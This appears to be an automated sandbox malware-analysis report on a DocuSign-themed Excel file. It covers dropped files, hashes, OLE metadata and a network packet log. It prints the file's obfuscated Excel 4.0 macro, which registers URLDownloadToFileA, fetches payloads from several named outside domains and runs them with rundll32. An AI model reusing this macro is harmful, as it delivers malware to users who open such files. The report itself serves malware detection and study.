                          SHA-512:1E218CA0DCEAC7A141E208C18646CE7EAC7855B30F64B0FBC579DF9990F917E1FCCBAA000A64F8168B66E46DCD8CC15206247191244D80EBE41717E9A187ABCC
                          Malicious:false
                          Preview: p...... ....h...x.......(....................................................... .........(.f...@8..................h.t.t.p.:././.c.r.t...u.s.e.r.t.r.u.s.t...c.o.m./.U.S.E.R.T.r.u.s.t.R.S.A.A.d.d.T.r.u.s.t.C.A...c.r.t...".5.c.8.6.f.6.8.0.-.5.8.5."...
                          C:\Users\user\AppData\Local\Temp\9ACE0000
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):31753
                          Entropy (8bit):7.647975541014588
                          Encrypted:false
                          SSDEEP:768:TkBP+MDFc5uhNUuOW+u7qS7oauYEmUI/V7nz:TQWMHNffMaFTBz
                          MD5:C450D67B76EB836299B13DE6DA5E1F16
                          SHA1:5617B9FC421C180FD7FCEC8054738DB0811B7FF2
                          SHA-256:0498E5ED54BDC48996FB1D86DF4B1A605D2AFF9DE3C280C652E00149F278B041
                          SHA-512:82550411A326F52E5184BA66AA4EB46FE18AE0259D7BCA02A106F0A3162F76AD901326AF8C1A49ED3756C9CC34AB811653F33BCFEDD97F3E6ABB8BCA76078570
                          Malicious:false
                          Preview: .U.n.0....?......(..r.Mrl.$...\K....I..v..pl).E.R.3;+.N.V.TO.Q{..f.*p.+..y......pJ..ek@v5..i.........O)...e.V`..8.Y.hE.... .Rt./'.o\z...:..l6...x4..Y..FIp..~n..T-.6..:?..k...!.-E....S{.j.Xh...GKb...... Y..Ic.....|.3..q.[..B.a.._.w...[.^g.....F....1.....+.}\._6.dk,..`...c.........(<.T....b....x5r&%...E.X!......\..w<M....\.7..9.........m..b.E.u...u.]...'t.(....}8..m...C~..E.....?..Z.]..i.D.O..B3....b.k..Z....x.A.yJ)P..y...........PK..........!........V.......[Content_Types].xml ...(.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\CabE18A.tmp
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:Microsoft Cabinet archive data, 59134 bytes, 1 file
                          Category:dropped
                          Size (bytes):59134
                          Entropy (8bit):7.995450161616763
                          Encrypted:true
                          SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                          MD5:E92176B0889CC1BB97114BEB2F3C1728
                          SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                          SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                          SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                          Malicious:false
                          Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                          C:\Users\user\AppData\Local\Temp\TarE18B.tmp
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):152788
                          Entropy (8bit):6.316654432555028
                          Encrypted:false
                          SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                          MD5:64FEDADE4387A8B92C120B21EC61E394
                          SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                          SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                          SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                          Malicious:false
                          Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Feb 24 18:53:37 2021, atime=Wed Feb 24 18:53:37 2021, length=16384, window=hide
                          Category:dropped
                          Size (bytes):867
                          Entropy (8bit):4.484286352929908
                          Encrypted:false
                          SSDEEP:12:85QPYJKLgXg/XAlCPCHaXtB8XzB/q0V8vX+WnicvbASbDtZ3YilMMEpxRljKQgTg:850l/XTd6jI0KvYeM+Dv3qRMrNru/
                          MD5:C3DF441E3A0FAA3865D6CBE65AE80420
                          SHA1:C8ADC68C8F216B0CE53988B7C776BF74D910C2AB
                          SHA-256:F46B8231349682FC73826208C6B3E319F1CEB297B587D44DE25EB674D6B146F6
                          SHA-512:AFE05879C5100952D22CB77BD51354AB1F695481A0AB6E892953410D6ABB183AA1AB0AEE594A0E897845753620E4FA295AE8C9F4B04DDEA3F259D345C033599B
                          Malicious:false
                          Preview: L..................F...........7G...............@......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....XR....Desktop.d......QK.XXR..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\494126\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......494126..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\SecuriteInfo.com.XF.AShadow.4960.21593.LNK
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Feb 24 18:53:26 2021, mtime=Wed Feb 24 18:53:37 2021, atime=Wed Feb 24 18:53:37 2021, length=57856, window=hide
                          Category:dropped
                          Size (bytes):2308
                          Entropy (8bit):4.583571527650622
                          Encrypted:false
                          SSDEEP:48:8Z//XT0jCH57SrHlRMQh2Z//XT0jCH57SrHlRMQ/:8Z//XojCkxRMQh2Z//XojCkxRMQ/
                          MD5:D3B67CEA335F33DF91E53F7DCA864414
                          SHA1:54978D6415E1E62EAEA254652D2494C424AB37C5
                          SHA-256:3004BAFFD2BB3F98B8B1D4AD377C26211E10C5B00DC2A935E1149412218B71C0
                          SHA-512:64D929D5E5BDF9263E5798445D367C5F69833AADF7F2C3EF9E293BA5802E51D31E151D30ACDFD9D5E0DCD3CBFA1710F8D0E3BE00B2C92F77BC47EB2A0DFC701D
                          Malicious:false
                          Preview: L..................F.... .....D...........^...................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....XR....Desktop.d......QK.XXR..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..:..XR.. .SECURI~1.XLS.........XR..XR..*...H.....................S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...X.F...A.S.h.a.d.o.w...4.9.6.0...2.1.5.9.3...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\494126\Users.user\Desktop\SecuriteInfo.com.XF.AShadow.4960.21593.xls.A.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.e.c.u.r.i.t.e.I.n.f.o...c.o.m...X.F...A.S.h.a.d.o.w...4.9.6.0...2.1.5.9.3...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.
                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):167
                          Entropy (8bit):5.11643252492809
                          Encrypted:false
                          SSDEEP:3:oyBVomM0biqoJL6ThEYYuscbiqoJL6ThEYYmM0biqoJL6ThEYYv:dj60TImVFTImVK0TImVC
                          MD5:ABDABA003B0855E784BF8E5C8143E3C2
                          SHA1:CE8D3FD2812648611BE370DE329A28DE3C384FAC
                          SHA-256:58685D6ED989BA45D0EC74987746F18F04469041C6CEE708A13AE3C1DBB979B8
                          SHA-512:AF8325DFE0E0E79F01441B741AAD0BF3853DEB6CD64877B1965D6EEE3670E5DAFC1049ED356EE2921E2374AB0F07998CC017032C1D9BA5C0F7B7EA2DB743AB09
                          Malicious:false
                          Preview: Desktop.LNK=0..[xls]..SecuriteInfo.com.XF.AShadow.4960.21593.LNK=0..SecuriteInfo.com.XF.AShadow.4960.21593.LNK=0..[xls]..SecuriteInfo.com.XF.AShadow.4960.21593.LNK=0..
                          C:\Users\user\Desktop\5BCE0000
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:Applesoft BASIC program data, first line number 16
                          Category:dropped
                          Size (bytes):88220
                          Entropy (8bit):6.54997160698009
                          Encrypted:false
                          SSDEEP:1536:rP8rmjAItyzElBIL6lECbgBGGP5xLmQWVxd7f85oaGzeNlz5QaGzeNlfFYVcDZKI:rP8rmjAItyzElBIL6lECbgBGGP5xLm7M
                          MD5:449C40C978932029A37F12CC14C9D86D
                          SHA1:1DD9186CCEC79A0B8438753630EF43838A771E7A
                          SHA-256:76630998E370E064979B7DC9B33DB6CA7E8C0A211B4A4DEE89F197D96C977B57
                          SHA-512:2059D9A2CCE52E90DE440C5874315A7A0C4FF55C4EB58588D043E738224A99C4B5FF974C8C08484BA62069FF173FDDA81104BD1537443AED1BDBC5A0A42A25A8
                          Malicious:false
                          Preview: ........g2..........................\.p....user B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.............

                          Static File Info

                          General

                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Last Saved By: Friner, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Feb 18 13:42:21 2021, Security: 0
                          Entropy (8bit):3.697666945848156
                          TrID:
                          • Microsoft Excel sheet (30009/1) 78.94%
                          • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                          File name:SecuriteInfo.com.XF.AShadow.4960.21593.xls
                          File size:145920
                          MD5:b00ae2a23ee80960d42e155f9814b490
                          SHA1:7673823a676d34a46128f8f6d7f09e8b2f3d8db4
                          SHA256:80d0f40411596b3f2350399c4d76f19d892771f835c1b2f6e3c77955e72e784f
                          SHA512:dca45ca42b21b954196f501d1d4396fb221d3e92c50cea599f8bb096e0acfe48428370a040d35a0da2ec268e32c26ff7d1adab862aecca9ae92838028646391a
                          SSDEEP:3072:GcPiTQAVW/89BQnmlcGvgZ6Gr3J8YUOMRt/BI/s/C/i/R/7/3/UQ/OhP/2/a/1/1:GcPiTQAVW/89BQnmlcGvgZ7r3J8YUOMU
                          File Content Preview:........................>......................................................................................................................................................................................................................................

                          File Icon

                          Icon Hash:e4eea286a4b4bcb4

                          General

                          Document Type:OLE
                          Number of OLE Files:1

                          Indicators

                          Has Summary Info:True
                          Application Name:Microsoft Excel
                          Encrypted Document:False
                          Contains Word Document Stream:False
                          Contains Workbook/Book Stream:True
                          Contains PowerPoint Document Stream:False
                          Contains Visio Document Stream:False
                          Contains ObjectPool Stream:
                          Flash Objects Count:
                          Contains VBA Macros:True

                          Summary

                          Code Page:1251
                          Author:
                          Last Saved By:Friner
                          Create Time:2006-09-16 00:00:00
                          Last Saved Time:2021-02-18 13:42:21
                          Creating Application:Microsoft Excel
                          Security:0

                          Document Summary

                          Document Code Page:1251
                          Thumbnail Scaling Desired:False
                          Contains Dirty Links:False
                          General
                          Stream Path:\x5DocumentSummaryInformation
                          File Type:data
                          Stream Size:4096
                          Entropy:0.321292606979
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c e l 4 . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 bc 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 0b 00 00 00 38 00 00 00 10 00 00 00 40 00 00 00 0d 00 00 00 48 00 00 00 0c 00 00 00 7c 00 00 00 02 00 00 00 e3 04 00 00 0b 00 00 00 00 00 00 00 0b 00 00 00 00 00 00 00 1e 10 00 00 03 00 00 00
                          General
                          Stream Path:\x5SummaryInformation
                          File Type:data
                          Stream Size:4096
                          Entropy:0.2746714277
                          Base64 Encoded:False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . d . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F r i n e r . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 9c 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 64 00 00 00 0c 00 00 00 7c 00 00 00 0d 00 00 00 88 00 00 00 13 00 00 00 94 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                          General
                          Stream Path:Book
                          File Type:Applesoft BASIC program data, first line number 8
                          Stream Size:135085
                          Entropy:3.69042254796
                          Base64 Encoded:True
                          Data ASCII:. . . . . . . . . 7 . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . F r i n e r B . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . . . . . . . . . . . . . . B I O L A F E . . ! . . . . . . . . . . . . . . . : . . . . . . . . . . . . . . A . . . . . . . . . . . . .
                          Data Raw:09 08 08 00 00 05 05 00 16 37 cd 07 e1 00 00 00 c1 00 02 00 00 00 bf 00 00 00 c0 00 00 00 e2 00 00 00 5c 00 70 00 06 46 72 69 6e 65 72 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                          ,,,,,,,,,,"=RIGHT(""dfrgbrd4567w547547w7b,DllRegister"",12)&T26",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&T19,40))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""1""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""2""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""3""&T19,41))",,,"=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=LEFT(123,0)=EXEC(RIGHT(""rsdtustyudmyajysruysr7l6sdt8l6t8m6udm7iru""&'DocuSign '!D139&"" ""&'DocuSign '!D141&""4""&T19,41))",,,=HALT(),,,,,,,,,,,
                          ,,,Server,,,,,,,,,,,,,,,,=NOW(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(D129,DocuSign!T26)",,,,,,,,,,,,,,,,,,,"=FORMULA.FILL(A130*1000000000000000,B133)",,,,,,,,,,,,,,,,,,,,,,"=RIGHT(""ghydbetrf46et5eb645bv7ea45istbsebtuRlMon"",6)",,,,,,,,,,,,,,,,,,,"=RIGHT(""45bh4g5nuwyftneragntrnrfaktsgbutnrkltgrkbownloadToFileA"",14)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REGISTER(D134,""URLD""&D135,""JJCCBB"",""BIOLAFE"",,1,9)",,,,,,,,,,,,,,,,,,,http://"=BIOLAFE(0,T137&B138&B133&D145&D146&D147&D148,D141,0,0)",rzminc.com/xklyulyijvn/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B139&B133&D145&D146&D147&D148,D141&""1"",0,0)",pathinanchilearthmovers.com/eznwcdhx/,,"=RIGHT(""hiuhnUBGYGBYnt7t67tb67rIftfFFDFFDTbtrdrtdgjcndll32"",6)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B140&B133&D145&D146&D147&D148,D141&""2"",0,0)",jugueterialatorre.com.ar/xjzpfwc/,,,,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B141&B133&D145&D146&D147&D148,D141&""3"",0,0)",rzminc.com/fdzgprclatqo/,,"=RIGHT(""nnhjgbgvdvgekvnrtve6reb6tn6rdtryt6smy65ty56s445nr6x..\JDFR.hdfgr"",13)",,,,,,,,,,,,,,,,"=BIOLAFE(0,T137&B142&B133&D145&D146&D147&D148,D141&""4"",0,0)",biblicalisraeltours.com/otmchxmxeg/,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,.,,,,,,,,,,,,,,,,,,,d,,,,,,,,,,,,,,,,,,,a,,,,,,,,,,,,,,,,,,,t,,,,,,,,,,,,,,,,=GOTO(DocuSign!T3),,,,,,,,,,,,,,,,,,,

                          Network Behavior

                          Network Port Distribution

                          • Total Packets: 59
                          • 443 (HTTPS)
                          • 80 (HTTP)
                          • 53 (DNS)
                           Timestamp | Source Port | Dest Port | Source IP | Dest IP
                           Feb 24, 2021 11:54:13.697228909 CET | 49167 | 80 | 192.168.2.22 | 72.52.227.180
                           Feb 24, 2021 11:54:13.847944021 CET | 80 | 49167 | 72.52.227.180 | 192.168.2.22
                           Feb 24, 2021 11:54:13.848059893 CET | 49167 | 80 | 192.168.2.22 | 72.52.227.180
                           Feb 24, 2021 11:54:13.848664999 CET | 49167 | 80 | 192.168.2.22 | 72.52.227.180
                           Feb 24, 2021 11:54:13.999258041 CET | 80 | 49167 | 72.52.227.180 | 192.168.2.22
                           Feb 24, 2021 11:54:14.320781946 CET | 80 | 49167 | 72.52.227.180 | 192.168.2.22
                           Feb 24, 2021 11:54:14.320823908 CET | 80 | 49167 | 72.52.227.180 | 192.168.2.22
                           Feb 24, 2021 11:54:14.321048975 CET | 49167 | 80 | 192.168.2.22 | 72.52.227.180
                           Feb 24, 2021 11:54:14.321799994 CET | 49167 | 80 | 192.168.2.22 | 72.52.227.180
                           Feb 24, 2021 11:54:14.472290993 CET | 80 | 49167 | 72.52.227.180 | 192.168.2.22
                           Feb 24, 2021 11:54:14.500850916 CET | 49168 | 80 | 192.168.2.22 | 162.241.80.6
                           Feb 24, 2021 11:54:14.659456015 CET | 80 | 49168 | 162.241.80.6 | 192.168.2.22
                           Feb 24, 2021 11:54:14.659682035 CET | 49168 | 80 | 192.168.2.22 | 162.241.80.6
                           Feb 24, 2021 11:54:14.660200119 CET | 49168 | 80 | 192.168.2.22 | 162.241.80.6
                           Feb 24, 2021 11:54:14.826414108 CET | 80 | 49168 | 162.241.80.6 | 192.168.2.22
                           Feb 24, 2021 11:54:15.358295918 CET | 80 | 49168 | 162.241.80.6 | 192.168.2.22
                           Feb 24, 2021 11:54:15.358560085 CET | 49168 | 80 | 192.168.2.22 | 162.241.80.6
                           Feb 24, 2021 11:54:15.753170967 CET | 49169 | 80 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:16.041574955 CET | 80 | 49169 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:16.041765928 CET | 49169 | 80 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:16.042413950 CET | 49169 | 80 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:16.330919981 CET | 80 | 49169 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:16.467619896 CET | 80 | 49169 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:16.467663050 CET | 80 | 49169 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:16.467823029 CET | 49169 | 80 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:16.479756117 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:16.777595043 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:16.777699947 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:16.788238049 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:17.085958004 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:17.087625027 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:17.087649107 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:17.087672949 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:17.087884903 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:17.102488041 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:17.400794983 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:17.401002884 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:19.178481102 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:19.516464949 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:20.358824968 CET | 80 | 49168 | 162.241.80.6 | 192.168.2.22
                           Feb 24, 2021 11:54:20.359031916 CET | 49168 | 80 | 192.168.2.22 | 162.241.80.6
                           Feb 24, 2021 11:54:21.342526913 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.342566013 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.342581987 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.342607021 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.342655897 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.342690945 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.342792988 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.342833996 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:21.342837095 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.342890978 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:21.342922926 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.342922926 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:21.342982054 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:21.343056917 CET | 443 | 49170 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.343153000 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:21.344804049 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:21.344891071 CET | 49170 | 443 | 192.168.2.22 | 138.36.237.100
                           Feb 24, 2021 11:54:21.350811958 CET | 49174 | 80 | 192.168.2.22 | 72.52.227.180
                           Feb 24, 2021 11:54:21.374596119 CET | 80 | 49169 | 138.36.237.100 | 192.168.2.22
                           Feb 24, 2021 11:54:21.374665976 CET | 49169 | 80 | 192.168.2.22 | 138.36.237.100
